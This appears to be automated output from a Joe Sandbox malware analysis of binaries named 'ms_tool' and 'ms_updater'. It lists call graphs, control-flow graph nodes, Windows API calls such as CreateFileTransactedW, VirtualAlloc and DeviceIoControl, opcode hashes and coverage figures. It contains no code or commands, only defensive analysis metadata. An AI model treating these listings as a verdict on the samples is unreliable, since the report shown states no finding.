7ff68c5e26c0 486 7ff68c5e26e4 485->486 487 7ff68c5e26f6 486->487 488 7ff68c5e26ff Sleep 486->488 489 7ff68c5e271b _amsg_exit 487->489 495 7ff68c5e2727 487->495 488->486 489->495 490 7ff68c5e2796 _initterm 493 7ff68c5e27b3 _IsNonwritableInCurrentImage 490->493 491 7ff68c5e277c 499 7ff68c5e1fdc SetThreadUILanguage SetErrorMode HeapSetInformation 493->499 494 7ff68c5e280d 496 7ff68c5e2824 494->496 497 7ff68c5e281c exit 494->497 495->490 495->491 495->493 496->491 498 7ff68c5e282d _cexit 496->498 497->496 498->491 500 7ff68c5e207a GetStdHandle GetConsoleMode 499->500 501 7ff68c5e205d GetLastError 499->501 505 7ff68c5e20f1 500->505 502 7ff68c5e12d4 13 API calls 501->502 503 7ff68c5e2070 502->503 504 7ff68c5e28c0 7 API calls 503->504 506 7ff68c5e219f 504->506 505->503 507 7ff68c5e2394 505->507 508 7ff68c5e22cc 505->508 506->494 511 7ff68c5e23d7 507->511 512 7ff68c5e2399 GetVolumeNameForVolumeMountPointW 507->512 509 7ff68c5e2323 508->509 510 7ff68c5e22d1 GetVolumeNameForVolumeMountPointW 508->510 515 7ff68c5e2331 DeleteVolumeMountPointW 509->515 516 7ff68c5e2498 509->516 514 7ff68c5e2300 510->514 513 7ff68c5e23df 511->513 526 7ff68c5e24e9 511->526 512->501 517 7ff68c5e23c1 512->517 518 7ff68c5e1348 8 API calls 513->518 514->509 515->503 519 7ff68c5e234a GetLastError 515->519 545 7ff68c5e2a98 RtlCaptureContext RtlLookupFunctionEntry 516->545 520 7ff68c5e1238 13 API calls 517->520 533 7ff68c5e23e4 518->533 519->501 521 7ff68c5e235f 519->521 522 7ff68c5e23d2 520->522 521->516 527 7ff68c5e2372 DefineDosDeviceW 521->527 522->516 523 7ff68c5e24df 523->494 525 7ff68c5e2563 SetVolumeMountPointW 525->516 526->525 528 7ff68c5e2527 QueryDosDeviceW 526->528 527->516 531 7ff68c5e254f 528->531 531->525 533->523 536 7ff68c5e2442 QueryDosDeviceW 533->536 536->531 537 7ff68c5e2472 536->537 540 7ff68c5e1660 20 API calls 537->540 541 7ff68c5e2481 540->541 541->523 542 7ff68c5e1494 5 API calls 541->542 543 7ff68c5e2494 542->543 543->516 544 7ff68c5e24af DefineDosDeviceW 543->544 544->516 546 7ff68c5e2ad5 RtlVirtualUnwind 545->546 547 7ff68c5e2b17 545->547 546->547 552 7ff68c5e28e4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 547->552 576 7ff68c5e2be0 SetUnhandledExceptionFilter 577 7ff68c5e2ba0 578 7ff68c5e2bd2 577->578 579 7ff68c5e2baf 577->579 579->578 580 7ff68c5e2bcb ?terminate@ 579->580 580->578 581 7ff68c5e2670 __getmainargs 582 7ff68c5e2890 585 7ff68c5e2db4 582->585 586 7ff68c5e2de0 6 API calls 585->586 587 7ff68c5e2899 585->587 586->587 588 7ff68c5e283b 589 7ff68c5e2853 588->589 590 7ff68c5e284a _exit 588->590 591 7ff68c5e285c _cexit 589->591 592 7ff68c5e2868 589->592 590->589 591->592 593 7ff68c5e159c CreateFileW 594 7ff68c5e1632 593->594 595 7ff68c5e15f0 DeviceIoControl 593->595 596 7ff68c5e1647 594->596 597 7ff68c5e1638 CloseHandle 594->597 595->594 597->596 598 7ff68c5e10ac 599 7ff68c5e10db _vsnwprintf 598->599 600 7ff68c5e10fc 598->600 599->600

                                                      Callgraph

Control-flow Graph (function at 7ff68c5e1754)
Memory Dump Source
• Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
• Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
Similarity
• API ID: Volume$ErrorFindLast$Local$CloseFree$NameNamesPath$AllocChangeControlCreateDeviceFileFirstFormatMessageNextNotification
• String ID: \\.\MountPointManager
• API String ID: 1486330377-3276014075
• Opcode ID: 4f1b137e6b44270cdbe81a40865537fca5d555951e32f5bc0a902f18b8e4e355
• Instruction ID: e63a3ba6870a7e250ae514d4c648a79eed8437527160e88bf835da0727ab5421
• Opcode Fuzzy Hash: 4f1b137e6b44270cdbe81a40865537fca5d555951e32f5bc0a902f18b8e4e355
• Instruction Fuzzy Hash: DA818232A08642C6EF549B61E4041BEBBA1FF89B50F459239DA5E837D1DF3CD415C702

Control-flow Graph
Memory Dump Source
• Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
• Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
Similarity
• API ID: Local$AllocFree$InformationQuerySystem
• String ID:
• API String ID: 3980593839-0
• Opcode ID: 6ddf1129da945206f3b33d3ec7b31e3c748a7bcc96a7b0cb28222ac49aeed3a8
• Instruction ID: c07f750ce35152697e6b21f6c2d745203fc63bb68bc8005c49dfa3635e0b21d7
• Opcode Fuzzy Hash: 6ddf1129da945206f3b33d3ec7b31e3c748a7bcc96a7b0cb28222ac49aeed3a8
• Instruction Fuzzy Hash: 6C216B31B08B82C6EE948B55E54417ABAA1FF89B80F55903ADB4F87746DF3CD861CB01

Control-flow Graph (function at 7ff68c5e13b4)
Memory Dump Source
• Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
• Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
• Opcode ID: ee6c0a8678e403f1ed9499553ee9dcd739a3b3037c75b270b4454832f7db71cd
• Instruction ID: 39ffd844a19a15848588f5307ef9bdbfbf2a242e0d8b268a9f321ad50e1f988e
• Opcode Fuzzy Hash: ee6c0a8678e403f1ed9499553ee9dcd739a3b3037c75b270b4454832f7db71cd
• Instruction Fuzzy Hash: 03219572608B41C6EB604F15F44055ABAA0FB857B4F149328DEBA43BF4DF38C066CB01

Control-flow Graph
Memory Dump Source
• Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
• Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
Similarity
• API ID: InformationQuerySystem
• String ID:
• API String ID: 3562636166-0
• Opcode ID: b489f29188039f25b10ca4aa454a7b4c9ee8bc4f3949ed7625baf762e72cb729
• Instruction ID: 10161c591be6f473f04b784ce896e7f3cde51592cc1722979c46268f3b034f5c
• Opcode Fuzzy Hash: b489f29188039f25b10ca4aa454a7b4c9ee8bc4f3949ed7625baf762e72cb729
• Instruction Fuzzy Hash: 70F03672A28685C7EB50CF20E49156AB371FB9D748B919239EA8D86504EF38E194CB00

Control-flow Graph
Memory Dump Source
• Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
• Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
Similarity
• API ID: Volume$Find$MountPoint$Close$FirstNameNext$ControlCreateDeviceDirectoryErrorFileHandleLastRemovememcpy
• String ID: %hs$\\.\MountPointManager
• API String ID: 1698496843-722914749
• Opcode ID: 29a9cc707cee59c8517bfaf76483b7fe94fdb033e3cae43ba1fd485cd4e056f7
• Instruction ID: 78c83c2a3130211dba6406f5afaeb4a8fe19c78b520d2771f2004bc5e2e37bc2
• Opcode Fuzzy Hash: 29a9cc707cee59c8517bfaf76483b7fe94fdb033e3cae43ba1fd485cd4e056f7
• Instruction Fuzzy Hash: CF71A032A08A82C6EF608F20E8442FA7BA4FF49B94F859139CA4E83754DF3CD559C701

Control-flow Graph (function at 7ff68c5e1fdc)
Memory Dump Source
• Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
• Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
Similarity
• API ID: ErrorMode$ConsoleFormatHandleHeapInformationLanguageLastMessageThread
• String ID:
• API String ID: 2611510217-0
• Opcode ID: b1c271bd61be92c86ed1bd6d37e711693baa63690a9554fba3a7541d918cc386
• Instruction ID: fe6f5cc3729442c1275d31ec0f5a11f4b5327f682c216798b0cc7cc3867b147c
• Opcode Fuzzy Hash: b1c271bd61be92c86ed1bd6d37e711693baa63690a9554fba3a7541d918cc386
• Instruction Fuzzy Hash: 12D1B132A18642C6EF649F24EC402B977A0FF48B44F81513ADA4EC7699DF3CE965C702

Control-flow Graph
Memory Dump Source
• Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
• Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
Similarity
• API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
• String ID:
• API String ID: 4291973834-0
• Opcode ID: 4ae1ec36ffe66ceb984f778016071e3338dd8f43b2d01ad686cb2e83bbe4d9b1
• Instruction ID: c2b44b659de3fd640f6605159054109f8f7635a7c171191d210cbc08f8d4340f
• Opcode Fuzzy Hash: 4ae1ec36ffe66ceb984f778016071e3338dd8f43b2d01ad686cb2e83bbe4d9b1
• Instruction Fuzzy Hash: 4741EE75E0C61BC6FF649B56E94027922A0BF48790F44053EDA0DC76AADF2CF8A0C742

Control-flow Graph
Memory Dump Source
• Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
• Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
Similarity
• API ID: LocalWrite$AllocByteCharConsoleFileFreeMultiWide
• String ID:
• API String ID: 3543570371-0
• Opcode ID: 5e08e7c95a99c52eb60246902b127f6bc43a3d2a40ff4cdd77f2489be4fee96d
• Instruction ID: 7c96c9f0946289f3e87768f2492e6e261aaaab87727b9b22f5e30c2fb349e771
• Opcode Fuzzy Hash: 5e08e7c95a99c52eb60246902b127f6bc43a3d2a40ff4cdd77f2489be4fee96d
• Instruction Fuzzy Hash: 2A216235A08B42C6EB148F11F84046ABB71FF89BA1F458239DE5E827A5CF3CE166C701

Control-flow Graph
Memory Dump Source
• Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
• Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
Similarity
• API ID: DeviceFormatMessageQuerylstrcmp
• String ID: :$\
• API String ID: 1650219507-1166558509
• Opcode ID: 5d99d3ed7c2355dc3fb6264f36c03b812a760603cbc98b657a64cab4886fd2bc
• Instruction ID: f728609613e26a99046e8618287de3b0964e7c57f11264079f32fe534b1ca6e7
• Opcode Fuzzy Hash: 5d99d3ed7c2355dc3fb6264f36c03b812a760603cbc98b657a64cab4886fd2bc
• Instruction Fuzzy Hash: 0C2150B2618681C2FE608F11E4003AB67A4FF89B84F455139DA8D8768ADF3CD555CB02

Control-flow Graph
Memory Dump Source
• Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
• Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
Similarity
• API ID: ConsoleFormatMessageWrite
• String ID:
• API String ID: 1159442765-0
• Opcode ID: febdcccd4a6ca5abf0651f36ac2c4d885d5640e56f15418ecebb4e798eb2bb65
• Instruction ID: ee1c9e8d5b7c4ac04eb766bd1548031e3ca3dfcc28cd5a85f6d9e933f2a9a41c
• Opcode Fuzzy Hash: febdcccd4a6ca5abf0651f36ac2c4d885d5640e56f15418ecebb4e798eb2bb65
• Instruction Fuzzy Hash: B6012C32A18B81C6EB24DB10F45525AB7A4FBD9784F414139E68C83B59EF7CD129CB41

Control-flow Graph
Memory Dump Source
• Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
• Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
Similarity
• API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 4104442557-0
• Opcode ID: 40e3f1c2d9f24896e6cf21ecc3f7062268da11ab292e1b49d4a7588a6e2f4437
• Instruction ID: 2ffcff26640156e382a8a63ee0d00a391533547908ad8261d3e2eaae61b16126
• Opcode Fuzzy Hash: 40e3f1c2d9f24896e6cf21ecc3f7062268da11ab292e1b49d4a7588a6e2f4437
• Instruction Fuzzy Hash: D2111A22A04B41CAEF00DF60E8442A833A4FB08758F410E38EA6D87B54EF7CD5A4C340

Control-flow Graph
Memory Dump Source
• Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
• Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID: \\.\MountPointManager
• API String ID: 33631002-3276014075
• Opcode ID: c6ab8fc516d38159cfff938e0a4f74ad7cc36754aaf57107d06ca0e3cd3c8a9d
• Instruction ID: f6e66a4fa6d2eb78de4e5aae04fa8c5fbb4ea23b2d4dbf75b6644bbd493c0333
• Opcode Fuzzy Hash: c6ab8fc516d38159cfff938e0a4f74ad7cc36754aaf57107d06ca0e3cd3c8a9d
• Instruction Fuzzy Hash: 3E114F32608B91C6DB148F58F404169BBA4FB89BB4F594329EA7E83BD4CF38C555CB04

Control-flow Graph
Memory Dump Source
• Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
• Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
Similarity
• API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
• String ID:
• API String ID: 140117192-0
• Opcode ID: 6d09d0d0d53610a89bff028a613da3a041f80898f6c4918de23eb4cbd6362075
• Instruction ID: 5bda5f33e66bc4798978511dde140a10917902d020a8cb260a629d7c3905a164
• Opcode Fuzzy Hash: 6d09d0d0d53610a89bff028a613da3a041f80898f6c4918de23eb4cbd6362075
• Instruction Fuzzy Hash: 8341A4B5A08B16C1EF548B18F89036973A4FF88794F90513ADA8E82764EF7CE564C702

Control-flow Graph
Memory Dump Source
• Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
• Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
Similarity
• API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
• String ID:
• API String ID: 140117192-0
• Opcode ID: 0de747106581f371168582486d9dc0af83d46a818d07c167d587705e8cee9617
• Instruction ID: 3f9ceb9f15156bafcb9fd5fd53517998c733b682ad27cc2a4785847bf89fe195
• Opcode Fuzzy Hash: 0de747106581f371168582486d9dc0af83d46a818d07c167d587705e8cee9617
• Instruction Fuzzy Hash: 2021B075A08F5AC1EB508B05F88036973A4FF88794F50013ADA8D83764EF7DE264C702

                                                      Execution Graph

                                                      Execution Coverage:15.7%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:23.8%
                                                      Total number of Nodes:21
                                                      Total number of Limit Nodes:2
                                                      execution_graph 19209 7ffd9baa9edd 19211 7ffd9baa9eff WriteFile 19209->19211 19212 7ffd9baa9fc7 19211->19212 19227 7ffd9baa9d6e 19228 7ffd9baa9d7d CreateFileTransactedW 19227->19228 19230 7ffd9baa9eaa 19228->19230 19231 7ffd9baab1d4 19232 7ffd9baab1dd VirtualAlloc 19231->19232 19234 7ffd9baab298 19232->19234 19213 7ffd9baaa0e1 19214 7ffd9baaa0eb 19213->19214 19217 7ffd9baaa177 19214->19217 19218 7ffd9baa8db8 19214->19218 19216 7ffd9baaa16b 19219 7ffd9baaa930 19218->19219 19221 7ffd9baaa9e9 19219->19221 19222 7ffd9baa8b98 19219->19222 19221->19216 19224 7ffd9baaaca0 19222->19224 19223 7ffd9baaada3 19223->19221 19224->19223 19225 7ffd9baaaf73 GetSystemInfo 19224->19225 19226 7ffd9baaafae 19225->19226 19226->19221

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 7ffd9bbe49cd-7ffd9bbf9e1f 3 7ffd9bbf9e21-7ffd9bbf9e2e 0->3 4 7ffd9bbf9e30-7ffd9bbf9e33 call 7ffd9bbf8738 0->4 7 7ffd9bbf9e38-7ffd9bbf9e77 call 7ffd9bbf11d8 3->7 4->7 12 7ffd9bbf9e79-7ffd9bbf9e8a call 7ffd9bbf11d8 7->12 13 7ffd9bbf9ea6 7->13 19 7ffd9bbf9e8c-7ffd9bbf9ea0 12->19 20 7ffd9bbf9ea2-7ffd9bbf9ea4 12->20 15 7ffd9bbf9eab-7ffd9bbf9eb8 13->15 17 7ffd9bbf9eba-7ffd9bbf9ebf 15->17 18 7ffd9bbf9ec1 15->18 21 7ffd9bbf9ec6-7ffd9bbf9ed2 17->21 18->21 19->15 20->15 22 7ffd9bbf9ed9-7ffd9bbf9f08 call 7ffd9bbe49b8 21->22 23 7ffd9bbf9ed4 21->23 27 7ffd9bbf9f0a-7ffd9bbf9f12 22->27 28 7ffd9bbf9f14 22->28 23->22 29 7ffd9bbf9f1c-7ffd9bbf9f42 27->29 28->29 33 7ffd9bbf9f44 29->33 34 7ffd9bbf9f4d-7ffd9bbf9f54 29->34 33->34 35 7ffd9bbf9f56-7ffd9bbf9f59 34->35 36 7ffd9bbf9f75-7ffd9bbf9f94 call 7ffd9bbf2dd0 call 7ffd9bbf2cb0 34->36 35->36 38 7ffd9bbf9f5b-7ffd9bbf9f69 35->38 43 7ffd9bbf9f99-7ffd9bbf9fc2 36->43 42 7ffd9bbf9f6b-7ffd9bbf9f73 38->42 38->43 42->43 44 7ffd9bbf9fd4-7ffd9bbfa002 call 7ffd9bbe49c8 43->44 45 7ffd9bbf9fc4-7ffd9bbf9fcd 43->45 48 7ffd9bbfa004-7ffd9bbfa00c call 7ffd9bbe4a18 44->48 49 7ffd9bbfa00e-7ffd9bbfa015 44->49 45->44 53 7ffd9bbfa028-7ffd9bbfa02f 48->53 51 7ffd9bbfa017-7ffd9bbfa01e 49->51 52 7ffd9bbfa020-7ffd9bbfa024 49->52 51->52 51->53 52->53 55 7ffd9bbfa03b-7ffd9bbfa051 call 7ffd9bbeabf8 53->55 56 7ffd9bbfa031-7ffd9bbfa039 53->56 57 7ffd9bbfa057-7ffd9bbfa0f1 55->57 56->57 59 7ffd9bbfa11b-7ffd9bbfa1b5 57->59 60 7ffd9bbfa0f3 57->60 63 7ffd9bbfa1b8-7ffd9bbfa1c0 59->63 62 7ffd9bbfa0f5-7ffd9bbfa0fe 60->62 65 7ffd9bbfa3cb-7ffd9bbfa3e3 62->65 66 7ffd9bbfa104-7ffd9bbfa114 62->66 63->65 67 7ffd9bbfa1c6-7ffd9bbfa1d9 63->67 72 7ffd9bbfa3eb-7ffd9bbfa3f9 65->72 73 7ffd9bbfa3e5-7ffd9bbfa3e9 65->73 66->62 69 7ffd9bbfa116 66->69 67->65 68 7ffd9bbfa1df-7ffd9bbfa1fa call 7ffd9bbe49a8 67->68 74 7ffd9bbfa1ff-7ffd9bbfa210 68->74 69->63 73->72 76 7ffd9bbfa21b 74->76 77 7ffd9bbfa212-7ffd9bbfa219 74->77 78 7ffd9bbfa21d-7ffd9bbfa229 76->78 77->78 78->65 79 7ffd9bbfa22f-7ffd9bbfa241 78->79 79->65 80 7ffd9bbfa247-7ffd9bbfa2a8 79->80 84 7ffd9bbfa2aa-7ffd9bbfa2ca 80->84 85 7ffd9bbfa2cd-7ffd9bbfa2eb 80->85 84->85 88 7ffd9bbfa335-7ffd9bbfa342 call 7ffd9bbf11d8 85->88 89 7ffd9bbfa2ed-7ffd9bbfa312 call 7ffd9bbf8790 call 7ffd9bbf87c0 call 7ffd9bbf8798 85->89 94 7ffd9bbfa344-7ffd9bbfa34b 88->94 95 7ffd9bbfa34d-7ffd9bbfa366 88->95 107 7ffd9bbfa314-7ffd9bbfa31d 89->107 108 7ffd9bbfa31f-7ffd9bbfa328 89->108 94->95 97 7ffd9bbfa391-7ffd9bbfa3b3 94->97 102 7ffd9bbfa368-7ffd9bbfa36d call 7ffd9bbf8790 95->102 103 7ffd9bbfa372-7ffd9bbfa390 95->103 97->65 102->103 110 7ffd9bbfa32e-7ffd9bbfa32f 107->110 108->110 110->88
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1772158838.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bbe0000_ms_updater.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: K$P$c$c$c
                                                      • API String ID: 0-3860519558
                                                      • Opcode ID: ebd9859a96d503eb731613f8848ce8640cb8eebdacd39542f117cb5ab54b1113
                                                      • Instruction ID: 03cb7e88c255c4bd363aed901e61e8618019dfd8fb82449db2c72bab8156e4d6
                                                      • Opcode Fuzzy Hash: ebd9859a96d503eb731613f8848ce8640cb8eebdacd39542f117cb5ab54b1113
                                                      • Instruction Fuzzy Hash: 00122230B19A4E8FE728DA7888A53F97AD2FF95309F05457DD08EC36D6CE2CA9458350

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 836 7ffd9baa8b98-7ffd9baaacb3 838 7ffd9baaacb5-7ffd9baaacd7 836->838 839 7ffd9baaacfd-7ffd9baaad0a 836->839 842 7ffd9baaacd9-7ffd9baaacdc 838->842 843 7ffd9baaad30-7ffd9baaad5a 838->843 840 7ffd9baaad0c-7ffd9baaad15 839->840 841 7ffd9baaad1a-7ffd9baaad20 839->841 840->841 844 7ffd9baaad17-7ffd9baaad18 840->844 845 7ffd9baaad25 841->845 846 7ffd9baaad22-7ffd9baaad23 841->846 848 7ffd9baaad5d-7ffd9baaad60 842->848 849 7ffd9baaacde-7ffd9baaace0 842->849 847 7ffd9baaad5c 843->847 844->841 850 7ffd9baaad2b-7ffd9baaad2e 845->850 846->845 847->848 851 7ffd9baaad62-7ffd9baaad6a 848->851 849->847 852 7ffd9baaace2 849->852 850->843 853 7ffd9baaada8-7ffd9baaadab 851->853 854 7ffd9baaad6c-7ffd9baaad7b 851->854 852->845 855 7ffd9baaace4-7ffd9baaace6 852->855 859 7ffd9baaadec-7ffd9baaadef 853->859 856 7ffd9baaad89-7ffd9baaad9f 854->856 857 7ffd9baaad7d-7ffd9baaad80 854->857 855->851 858 7ffd9baaace8 855->858 856->854 868 7ffd9baaada1 856->868 857->856 860 7ffd9baaad82-7ffd9baaad87 857->860 858->850 861 7ffd9baaacea-7ffd9baaacfb call 7ffd9baa8cd8 858->861 863 7ffd9baaadad-7ffd9baaadbb call 7ffd9baa8ba0 859->863 864 7ffd9baaadf1 859->864 860->856 866 7ffd9baaada3-7ffd9baaaebf 860->866 861->839 874 7ffd9baaadc0-7ffd9baaadc6 863->874 865 7ffd9baaae11-7ffd9baaae14 864->865 870 7ffd9baaae16-7ffd9baaae19 865->870 871 7ffd9baaae7f-7ffd9baaae82 865->871 868->853 875 7ffd9baaae5a-7ffd9baaae5d 870->875 877 7ffd9baaaec0-7ffd9baaaecc 871->877 878 7ffd9baaae84-7ffd9baaaeaa 871->878 874->865 876 7ffd9baaadc8-7ffd9baaadea call 7ffd9baa8cf8 874->876 880 7ffd9baaae1b-7ffd9baaae34 call 7ffd9baa8ba8 875->880 881 7ffd9baaae5f 875->881 876->859 891 7ffd9baaadf3-7ffd9baaae0f 876->891 884 7ffd9baaaf1c-7ffd9baaafac GetSystemInfo 877->884 885 7ffd9baaaece-7ffd9baaaf09 877->885 880->871 893 7ffd9baaae36-7ffd9baaae58 call 7ffd9baa8cf8 880->893 881->871 901 7ffd9baaafae 884->901 902 7ffd9baaafb4-7ffd9baaafd5 884->902 903 7ffd9baaaf0b-7ffd9baaaf0f 885->903 904 7ffd9baaaf11-7ffd9baaaf1a 885->904 891->865 893->875 900 7ffd9baaae61-7ffd9baaae7d 893->900 900->871 901->902 903->904 904->884
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1771443053.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9baa0000_ms_updater.jbxd
                                                      Similarity
                                                      • API ID: InfoSystem
                                                      • String ID:
                                                      • API String ID: 31276548-0
                                                      • Opcode ID: f8791edfe342db74c320fd7bc9bd94041de1c572dd9e9818374e6eac91f2e79b
